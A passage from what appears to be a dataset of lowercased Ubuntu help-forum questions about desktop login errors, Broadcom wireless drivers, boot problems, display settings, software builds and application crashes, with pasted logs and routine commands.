info : loading plugin : animation /usr/lib/pymodules/python2.7/fluxgui/fluxgui.py:162 : gtkwarning : can not transform xsetting net/iconthemename of type gchararray to type gdkcolor 'gtk-icon-theme-name ' ) /usr/lib/pymodules/python2.7/fluxgui/fluxgui.py:162 : warning : g_value_unset : assertion `g_is_value ( value ) ' failed 'gtk-icon-theme-name ' ) /usr/lib/pymodules/python2.7/fluxgui/fluxgui.py:162 : gtkwarning : can not transform xsetting net/iconthemename of type gchararray to type gint 'gtk-icon-theme-name ' ) compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : fade ( nautilus:2593 ) : glib-gobject-critical ** : g_object_set : assertion `g_is_object ( object ) ' failed ( nautilus:2593 ) : glib-gobject-critical ** : g_object_set : assertion `g_is_object ( object ) ' failed compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : unityshell nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . compiz ( core ) - info : starting plugin : unityshell compiz ( core ) - warn : attempted to restack relative to 0x1800009 which is not a child of the root window or a window compiz owns ** message : moving back from gtkstatusicon to indicator ( process:2823 ) : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed ** ( nm-applet:2576 ) : warning ** : could not find shellversion property on org.gnome.shell after 5 tries ** ( zeitgeist-datahub:3001 ) : warning ** : zeitgeist-datahub.vala:231 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! ( gnome-settings-daemon:2524 ) : libappindicator-critical ** : app_indicator_set_label : assertion `is_app_indicator ( self ) ' failed ( gnome-settings-daemon:2524 ) : libappindicator-critical ** : app_indicator_set_label : assertion `is_app_indicator ( self ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed ( gnome-screensaver:3000 ) : gtk-critical ** : gtk_widget_set_visible : assertion `gtk_is_widget ( widget ) ' failed attention : default value of option force_s3tc_enable overridden by environment . ( gnome-settings-daemon:2524 ) : libappindicator-critical ** : app_indicator_set_label : assertion `is_app_indicator ( self ) ' failed ( gnome-settings-daemon:2524 ) : libappindicator-critical ** : app_indicator_set_label : assertion `is_app_indicator ( self ) ' failed ( gnome-settings-daemon:2524 ) : libappindicator-critical ** : app_indicator_set_label : assertion `is_app_indicator ( self ) ' failed ( gnome-settings-daemon:2524 ) : libappindicator-critical ** : app_indicator_set_label : assertion `is_app_indicator ( self ) ' failed compiz ( decor ) - warn : no default decoration found , placement will not be correct ( gnome-settings-daemon:2524 ) : wacom-plugin-critical ** : gsd_wacom_device_get_device_type : assertion `gsd_is_wacom_device ( device ) ' failed ( gnome-settings-daemon:2524 ) : wacom-plugin-critical ** : gsd_wacom_device_get_device_type : assertion `gsd_is_wacom_device ( device ) ' failed ( gnome-settings-daemon:2524 ) : wacom-plugin-critical ** : gsd_wacom_device_get_device_type : assertion `gsd_is_wacom_device ( device ) ' failed ( gnome-settings-daemon:2524 ) : wacom-plugin-critical ** : gsd_wacom_device_get_device_type : assertion `gsd_is_wacom_device ( device ) ' failed ( gnome-settings-daemon:2524 ) : wacom-plugin-critical ** : gsd_wacom_device_get_device_type : assertion `gsd_is_wacom_device ( device ) ' failed ( gnome-settings-daemon:2524 ) : wacom-plugin-critical ** : gsd_wacom_device_get_device_type : assertion `gsd_is_wacom_device ( device ) ' failed ( gnome-settings-daemon:2524 ) : wacom-plugin-critical ** : gsd_wacom_device_get_device_type : assertion `gsd_is_wacom_device ( device ) ' failed ( gnome-settings-daemon:2524 ) : wacom-plugin-critical ** : gsd_wacom_device_get_device_type : assertion `gsd_is_wacom_device ( device ) ' failed gnome-session [ 2446 ] : critical : gsm_manager_set_phase : assertion `gsm_is_manager ( manager ) ' failed gnome-session [ 2446 ] : gtk-critical : gtk_main_quit : assertion `main_loops ! = null ' failed ( nm-applet:2576 ) : gdk-warning ** : nm-applet : fatal io error 11 ( resource temporarily unavailable ) on x server :0. gtk-window-decorator : fatal io error 11 ( resource temporarily unavailable ) on x server :0.0 . ( update-notifier:3106 ) : gdk-warning ** : update-notifier : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( gnome-screensaver:3000 ) : gdk-warning ** : gnome-screensaver : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( telepathy-indicator:2915 ) : gdk-warning ** : telepathy-indicator : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( gnome-fallback-mount-helper:2577 ) : gdk-warning ** : gnome-fallback-mount-helper : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( deja-dup-monitor:3136 ) : gvfs-remotevolumemonitor-warning ** : owner of volume monitor org.gtk.private.udisks2volumemonitor disconnected from the bus ; removing drives/volumes/mounts ( deja-dup-monitor:3136 ) : gvfs-remotevolumemonitor-warning ** : owner of volume monitor org.gtk.private.mtpvolumemonitor disconnected from the bus ; removing drives/volumes/mounts ( deja-dup-monitor:3136 ) : gvfs-remotevolumemonitor-warning ** : owner of volume monitor org.gtk.private.afcvolumemonitor disconnected from the bus ; removing drives/volumes/mounts ( deja-dup-monitor:3136 ) : gvfs-remotevolumemonitor-warning ** : owner of volume monitor org.gtk.private.gphoto2volumemonitor disconnected from the bus ; removing drives/volumes/mounts ( nautilus:2593 ) : gdk-warning ** : nautilus : fatal io error 0 ( success ) on x server :0 . now there are a lot of things in here that do n't sound good , but unfortunately , i 'm not really sure what most of them mean . i was using my computer just fine this morning , and rebooted when a javascript vpn log in applet was n't working correctly ( one that i use routinely without issue from my employer ) , and after the reboot , i was unable to log in . any assistance is greatly appreciated !
345585	kernel fails to build broadcomm dkms modules , how to fix it ?	my computer is not recognising the wireless network . when i try to activate my drivers i get errors . i tried to solve by : sudo apt-get remove bcmwl-kernel-source sudo apt-get install bcmwl-kernel-source but i am getting these errors : building initial module for 3.8.0-30-generic error ! bad return status for module build on kernel : 3.8.0-30-generic ( i686 ) consult /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/make.log for more information . fatal : module wl not found . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-30-generic lsmod : module size used by bnep 17852 2 rfcomm 38400 12 parport_pc 27612 0 ppdev 12849 0 uvcvideo 72250 0 i915 550344 8 videobuf2_core 39385 1 uvcvideo videodev 96131 2 uvcvideo , videobuf2_core radeon 892298 1 coretemp 13324 0 videobuf2_vmalloc 12920 1 uvcvideo videobuf2_memops 13042 1 videobuf2_vmalloc snd_hda_codec_hdmi 36564 1 snd_hda_codec_idt 64649 1 snd_hda_intel 38819 5 ttm 72088 1 radeon snd_hda_codec 118650 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel kvm_intel 127786 0 snd_hwdep 13276 1 snd_hda_codec snd_pcm 85934 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec drm_kms_helper 47749 2 i915 , radeon btusb 17951 0 snd_seq_midi 13132 0 snd_rawmidi 25157 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi joydev 17329 0 bluetooth 211435 24 bnep , rfcomm , btusb kvm 384557 1 kvm_intel snd_seq 51593 2 snd_seq_midi , snd_seq_midi_event drm 233935 7 i915 , radeon , ttm , drm_kms_helper snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq hp_accel 25756 0 psmouse 82769 0 snd 57014 20 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device lis3lv02d 19536 1 hp_accel mei 36756 0 hp_wmi 17748 0 intel_ips 17738 0 serio_raw 13031 0 sparse_keymap 13658 1 hp_wmi microcode 18433 0 i2c_algo_bit 13316 2 i915 , radeon lpc_ich 17048 0 input_polldev 13648 1 lis3lv02d soundcore 12600 1 snd video 19116 1 i915 snd_page_alloc 18398 2 snd_hda_intel , snd_pcm wmi 18744 1 hp_wmi mac_hid 13077 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp ahci 25631 4 libahci 26336 1 ahci r8169 62532 0
345588	what is the safest way to clean up /boot partition ?	i 've got 200 mb assigned for the /boot partition . everytime i try to update the kernel i get an error message that basically says the size of /boot is full . what can i do to cleanup /boot and remote/backup the older kernels ?
345590	ubuntu boots , but stays on shell !	i have a dell optiplex 160l and i 'm booting ubuntu 13.04 from a linuxlivekey usb . it loads all the way through the purple ubuntu loading screen then goes back to shell . then it gets stuck on ubuntu @ ubuntu : ~ $ also could it be a problem that i 'm using a 1 gb usb ? is there a reason why it does n't boot ? or is my hardware to crappy for it ?
345591	turning backlight on on external monitor	i have a lenovo laptop running xubuntu smoothly . i plugged in a dvi monitor with a hdmi to dvi wire . the display works perfectly for two seconds then the backlight turns off . i cant find a way to configure it , it seems like the problem comes from ubuntu since i had the same problem with my laptop screen but was able to fix it with xbacklight . i used `` xrandr -- source hdmi -- brightness 100 '' but it only makes the screen white with no backlight . any help appreciated , thanks to all
345592	ca n't mount cd/dvd drive in 13.04	i 'm currently going out of my mind ! is there somebody , please , to help to find my way out of this misery ? i ca n't mount cd/dvd drive in 13.04 . if you do n't help i 'll be forced to go back to ... it is even hard for me to type it ... to windows . i 've tried with dvd , with music cd , with data cd ... nothing . but , i can boot from a cd/dvd drive , it is not a problem . what should i do ? thanks in advance .
345593	how to build vim with gui option from sources ?	i 'm having a hard time building a vim 7.4 ( obtained from vim 's ftp site ) with gui option . it builds ok without the gui option . here 's how i 'm doing it : cd ~/downloads/vim74/src ./configure -- enable-gui the above line does not seem to work because i get this output from the command : ./configure -- enable-gui | grep gui checking -- enable-gui argument ... no gui support i uncommented line 352 of the makefile to enable the gui ( i think ) : conf_opt_gui = -- enable-gui=gtk2 but when i run vim -g ( after rebuilding ) i get : e25 : gui can not be used : not enabled at compile time there 's a suggestion in the makefile to check the generated auto/config.h and auto/config.mk files but the files are empty ( less than 10 lines ) . how do you fix this ?
345596	any way to access command line when desktop freezes ?	occasionally ubuntu 12.04 64-bit on my panasonic cf-51 laptop will freeze up . the mouse cursor can still be moved , but i can not access anything and no shortcut keys seem to work . is there any way to access the terminal when this happens ?
345598	screen randomly switches to console	i have the following problem with ubuntu 13.04 : gui randomly switches to console mode . if i suspend and wake up , it is in gui again . a related issue is when i switch to a different terminal ( e.g . ctrl+alt+f1 ) and then switch back to tty7 ( ctrl+alt+f7 ) - i see the same console i mentioned before ( looks like a system log ) . i tried all ctrl+alt+fn and ctrl+alt+fn+fn , but it does not help . the only thing that helps is suspending ( i.e . closing the lid ) and waking up .
345599	run command as a login shell in pantheon terminal	where i can find option : “run command as a login shell” in pantheon terminal ?
345602	how to install ubuntu 13.10 on acer c7 chromebook via usb ?	i am using chromebook acer c7 . since the bios is efi , how can i install ubuntu 13.10 from usb on that laptop ? will unetbootin work on that ? as i went to that website it tells that it ca n't boot from mac os x devices , so i suppose it will not work on chromebooks . so if not then what tool will ? i heard that ubuntu 13.10 will come with kernel 9.12 or something that which will support chromebook . but can i make bootable usb or will it download and install from net as 12.04 and 13.04 do directly ? can anybody help ?
345606	who manages ubuntu packages ?	2 packages available for ubuntu server 12.04 that i 've come across are horribly out of date : nginx and phpmyadmin . i use ppas to manage these , but i 've often wondered why these packages are so out of date while others are not ( php5 , mysql , for example ) .
345608	having trouble installing bradcom sta driver	i just installed ubuntu and love it so much , its so fast now . but i have a problem connecting to the internet . i checked and saw i have to install the driver broadcom sta wireless driver but every time i do try to install it it says : sorry , installation of this driver failed . please have a look at the log files for details : /var/log/jockey.log i went to the terminal and copy and pasted the log file name . and when i did it , it said i have no permission to access this file . i checked on the forums that i have to be on a wired connection . so i plugged my laptop into my router and i got internet then tried to install the driver again . and it was loading then when it got to the end the same message popped up . also i have one of those little usb router things you plug into the computer and it gives you internet i have been using that but its to slow . so i want to use the one in my computer but cant . also i tried the command : sudo modprobe wl and when i type that command in it says : fatal : module wl not found also i 'm using ubuntu 12.04
345610	ubuntu phone for huawei honor 2 u9508	i liked ubuntu and i would like to see ubuntu on my phone ( huawei honor 2 u9508 ) . is this possible ? if so- when this wait ?
345613	trying to install ubuntu touch , what is sources.list ?	i am following instructions for installing ubuntu touch onto my phone , and i am at a loss for the instruction asking me to append my sources.list . can someone please clue me in ? below is the context the ppa has the tools and dependencies to support precise , quantal , and raring . add the ubuntu touch ppa by adding the following custom source list entry to your /etc/apt/sources.list file . on your computer , press ctrl+alt+t to start a terminal . sudo add-apt-repository ppa : phablet-team/tools or if add-apt-repository is not available , append the following to your sources.list : deb http : //ppa.launchpad.net/phablet-team/tools/ubuntu [ dist-codename ] main deb-src http : //ppa.launchpad.net/phablet-team/tools/ubuntu [ dist-codename ] main *note : replace [ dist-codename ] with precise , quantal , raring or saucy . then do the following : sudo apt-get update sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot
345616	ubuntu tablet for samsung ativ smart pc pro ( xe700t1c-a02nl )	i recently bought this samsung ativ smart pc . this has some windows 8 which is pretty nice . but ofcourse i need ubuntu for this . now i saw this ubuntu tablet version and my question is can i get this installation on my smart pc ? thanks !
345617	ca n't change the brightness with nomodeset	if i try and boot without nomodeset i go to a black screen . on this i can adjust my brightness using fn + < -/- > but i ca n't actually do anything . i can boot with nomodeset but then i can not change brightness . i have tried boot options like acpi_osi=linux and acpi_backlight=vendor which have no effect . i 've seen some recommendations to edit /sys/class/backlight/acpi_video0/brightness , but my /sys/class/backlight directory is empty . i 'm guessing there 's a problem with my video drivers ( i have intel hd 4000 ) ? the output of lspci -nnk | grep -a5 vga is as follows 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : acer incorporated [ ali ] device [ 1025:0799 ] 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family > usb xhci host controller [ 8086:1e31 ] ( rev 04 ) subsystem : acer incorporated [ ali ] device [ 1025:0799 ] kernel driver in use : xhci_hcd 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 )
345619	steam does n't run , no error	i 'm trying to run steam , this problem seems to have started when i updated steam yesterday . i get this output , but nothing after that . steam does not start $ steam running steam on ubuntu 13.04 64-bit steam_runtime is enabled automatically $ can anyone suggest a way that i can get more information about this or fix it ?
345623	wireless internet not working - can not activate broadcom proprietary driver	i have seen this question asked by others but despite trying as many solutions as i can nothing seems to be working ! the closest i have come is using the answer to this question broadcom driver woes which says i have connected to the wireless network , but it does n't actually work . i have an additional driver ( the broadcom sta wireless driver and from my play with the terminal its bcm 4312 ) but it will not activate . what else can i try ? and what other info would be helpful for you ? i am loving everything else about linux and excited to use it on the wireless ! thanks for any help . -- -update -- - the below path worked brilliantly - thank you so much !
345625	ca n't set the resolution of my monitor on displayport	my graphics card has a dvi port and two display ports . i have two of the same monitors , one on dvi , one on dp , but ca n't get xrandr to set the resolution on the dp one . i ca n't use xrandr -- addmode directly to dp-0 without getting an error : screen 0 : minimum 8 x 8 , current 1952 x 864 , maximum 16384 x 16384 dvi-i-0 connected 1152x864+800+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 1360x768 60.0 59.8 1152x864 60.0* 800x600 72.2 60.3 56.2 680x384 119.9 119.6 640x480 59.9 512x384 120.0 400x300 144.4 320x240 120.1 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) dp-0 connected 800x600+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 800x600 60.3*+ dp-1 disconnected ( normal left inverted right x axis y axis ) dp-2 disconnected ( normal left inverted right x axis y axis ) dp-3 disconnected ( normal left inverted right x axis y axis ) 1368x768_60.00 ( 0x33c ) 85.2mhz h : width 1368 start 1440 end 1576 total 1784 skew 0 clock 47.8khz v : height 768 start 771 end 781 total 798 clock 59.9hz 1360x768_60.00 ( 0x357 ) 84.8mhz h : width 1360 start 1432 end 1568 total 1776 skew 0 clock 47.7khz v : height 768 start 771 end 781 total 798 clock 59.8hz 1024x768_60.00 ( 0x395 ) 63.5mhz h : width 1024 start 1072 end 1176 total 1328 skew 0 clock 47.8khz v : height 768 start 771 end 775 total 798 clock 59.9hz 1280x800_60.00 ( 0x3b3 ) 83.5mhz h : width 1280 start 1352 end 1480 total 1680 skew 0 clock 49.7khz v : height 800 start 803 end 809 total 831 clock 59.8h here is the error : $ xrandr -- addmode dp-0 1360x768_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 35 current serial number in output stream : 36
345628	how to get the urls of all the packages that an application depends on ?	i want to install gnome-shell package without using apt by getting the dependent packages and building them myself so that i wo n't have to download them the next time i do a fresh install . i want a way to get the urls of the 40+ packages required by gnome-shell so that i can wget them .
345633	just installed ubuntu 12.04 on my acer aspire 5740g laptop , it constantly shuts down itself due temperature , how to diagnostique ?	i do n't know what causes it since i just installed ubuntu on my laptop . here is the issue . ubuntu boots normally , so i can use firefox and such . however , after 2-3 minutes , laptop shuts down . ( i see ubuntu logo for 1 second before shutdown . ) fans are usually working loud . gpu drivers ( 5470 ) does n't seem to be installed . anyone knows what can be the issue ? ps . previously , i used windows 7 and it did n't create any issues .
345635	problems installing stepmania on ubuntu 12.04	i 'm trying to install stepmania , following these instructions : http : //ubuntuforums.org/showthread.php ? t=2138685 i finally figured out how to install libpng1.5.15 thanks to someone on here . now i 'm having trouble with the final step . i extracted the .tar.bz2 file to my desktop , and did the `` cd desktop/stepmania '' command . the next command is the one that gives me trouble , though : `` ./stepmania '' when i enter `` ./stepmania '' it gives me an error message , and a crash info txt file . i 'll copy and paste all of that . me @ laptop : ~/desktop/stepmania $ ./stepmania stepmania v5.0 beta 1a compiled 20121229 @ 14:24:04 cet ( utc+01:00 ) ( build 0 ) log starting 2013-09-14 13:29:44 loading window : gtk os : linux ver 030500 crash backtrace component : x86 custom backtrace crash lookup component : dladdr crash demangle component : cxa_demangle runtime library : glibc 2.15 threads library : nptl 2.15 libavcodec : 0x352300 ( 3482368 ) tls is available ///////////////////////////////////////// warning : readfile ( save/themeprefs.ini ) : no such file or directory ///////////////////////////////////////// alsa : advanced linux sound architecture driver version 1.0.25 . alsa driver : 0 : hda intel pch [ pch ] , device 0 : vt1802 analog [ vt1802 analog ] , 1/1 subdevices avail alsa driver : 0 : hda intel pch [ pch ] , device 2 : vt1802 hp [ vt1802 hp ] , 1/1 subdevices avail alsa driver : 0 : hda intel pch [ pch ] , device 3 : hdmi 0 [ hdmi 0 ] , 1/1 subdevices avail alsa : dsnd_pcm_hw_params_set_access : invalid argument could n't load driver alsa-sw : sethwparams failed sound driver : pulse ///////////////////////////////////////// warning : error opening serial port for lights . error : : 2 no such file or directory ///////////////////////////////////////// lights driver : piuio lights driver : systemmessage lights driver : export ( stepmania:19700 ) : gtk-critical ** : ia__gtk_style_detach : assertion `style- > attach_count > 0 ' failed video renderers : 'opengl' display : :0.0 ( screen 0 ) x server vendor : the x.org foundation [ 1.13.0.0 ] server glx vendor : sgi [ 1.4 ] client glx vendor : mesa project and sgi [ 1.4 ] ///////////////////////////////////////// warning : x11 protocol error badalloc ( insufficient resources for operation ) ( 11 ) has occurred , caused by request 154,3 , resource id 39 ///////////////////////////////////////// ///////////////////////////////////////// warning : x11 protocol error glxbadcontext ( 172 ) has occurred , caused by request 154,3 , resource id 79691781 ///////////////////////////////////////// ///////////////////////////////////////// warning : x11 protocol error glxbadcontext ( 172 ) has occurred , caused by request 154,5 , resource id 79691781 ///////////////////////////////////////// ptrace failed : operation not permitted ptrace failed : operation not permitted ptrace failed : operation not permitted ptrace failed : operation not permitted ptrace failed : operation not permitted stepmania 5 has crashed . debug information has been output to /tmp/crashinfo.txt please report a bug at : http : //ssc.ajworld.net/sm-ssc/bugtracker/ killed and then the crashinfo.txt says : stepmania v5.0 beta 1a crash report ( build 0 , 20121229 @ 14:24:04 cet ( utc+01:00 ) ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- architecture : unix crash reason : segmentation fault - address not mapped at 0x000000000000000c crashed thread : main thread checkpoints : thread : main thread profile.cpp:1427 profile.cpp:1504 profile.cpp:1608 profile.cpp:1663 profile.cpp:1697 thread : decode thread thread : music thread thread : worker thread ( memorycardworker ) thread : worker thread ( / @ mc1int/ ) thread : worker thread ( / @ mc2int/ ) thread : main thread 00007fdfb9de2cc0 : 00007fdfbe5264d4 : 00007fdfbe5264d4 : 00007fdfbe523f2c : 0000000000ac7f3f : setupextensions ( ) static log : stepmania v5.0 beta 1a compiled 20121229 @ 14:24:04 cet ( utc+01:00 ) ( build 0 ) log starting 2013-09-14 13:29:44 loading window : gtk os : linux ver 030500 crash backtrace component : x86 custom backtrace crash lookup component : dladdr crash demangle component : cxa_demangle runtime library : glibc 2.15 threads library : nptl 2.15 libavcodec : 0x352300 ( 3482368 ) tls is available warning : readfile ( save/themeprefs.ini ) : no such file or directory alsa : advanced linux sound architecture driver version 1.0.25 . alsa driver : 0 : hda intel pch [ pch ] , device 0 : vt1802 analog [ vt1802 analog ] , 1/1 subdevices avail alsa driver : 0 : hda intel pch [ pch ] , device 2 : vt1802 hp [ vt1802 hp ] , 1/1 subdevices avail alsa driver : 0 : hda intel pch [ pch ] , device 3 : hdmi 0 [ hdmi 0 ] , 1/1 subdevices avail alsa : dsnd_pcm_hw_params_set_access : invalid argument could n't load driver alsa-sw : sethwparams failed sound driver : pulse warning : error opening serial port for lights . error : : 2 no such file or directory lights driver : piuio lights driver : systemmessage lights driver : export video renderers : 'opengl' display : :0.0 ( screen 0 ) x server vendor : the x.org foundation [ 1.13.0.0 ] server glx vendor : sgi [ 1.4 ] client glx vendor : mesa project and sgi [ 1.4 ] warning : x11 protocol error badalloc ( insufficient resources for operation ) ( 11 ) has occurred , caused by request 154,3 , resource id 39 warning : x11 protocol error glxbadcontext ( 172 ) has occurred , caused by request 154,3 , resource id 79691781 warning : x11 protocol error glxbadcontext ( 172 ) has occurred , caused by request 154,5 , resource id 79691781 language : en current renderer : opengl theme : default partial log : 00:00.159 : applying defaults for opengl . 00:00.159 : video renderers : 'opengl' 00:00.159 : ragedisplay_legacy : :ragedisplay_legacy ( ) 00:00.159 : display : :0.0 ( screen 0 ) 00:00.160 : x server vendor : the x.org foundation [ 1.13.0.0 ] 00:00.163 : server glx vendor : sgi [ 1.4 ] 00:00.163 : client glx vendor : mesa project and sgi [ 1.4 ] 00:00.257 : warning : x11 protocol error badalloc ( insufficient resources for operation ) ( 11 ) has occurred , caused by request 154,3 , resource id 39 00:00.257 : warning : x11 protocol error glxbadcontext ( 172 ) has occurred , caused by request 154,3 , resource id 79691781 00:00.257 : warning : x11 protocol error glxbadcontext ( 172 ) has occurred , caused by request 154,5 , resource id 79691781 -- end of report i 'm pretty new to ubuntu/linux , so i 'm still trying to figure it out . i do n't understand most of it so far . thanks for any help you can give me .
345638	does maas provide options for high availability or redundancy ?	is there any way for maas to have redundancy or high availability for the region or cluster controllers ?
345639	fujitsu-usb-touchscreen on kubuntu 13.04 ( 64-bit ) on p1630 : `make` errors	i installed kubuntu 13.04 ( 64-bit ) on my new fujitsu lifebook p1630 , and added just a few packages : first aptitude , then i did aptitude update & & safe-upgrade , then xinput-calibrator ( which seems to work , except that i have to run it again every time i restart the system ) , then gcc , make , build-essential , checkinstall , binutils , and linux-source . then i downloaded the file cybergene-fujitsu-usb-touchscreen-112fdb75b406.zip which is linked from the page https : //bitbucket.org/cybergene/fujitsu-usb-touchscreen/overview ( i 'm assuming it 's the elusive v0.3.9 , which does n't seem to be linked under that name from anywhere ) ; i extracted its contents to a directory ~/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406 and attempted to run make . the console ( er , konsole ) trace is below : archelon @ ingelrayok : ~/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406 $ make make -c /lib/modules/3.8.0-30-generic/build m=/home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-30-generic' cc [ m ] /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.o /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c : in function ‘usb_u810_tablet_irq’ : /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:133:4 : error : implicit declaration of function ‘dbg’ [ 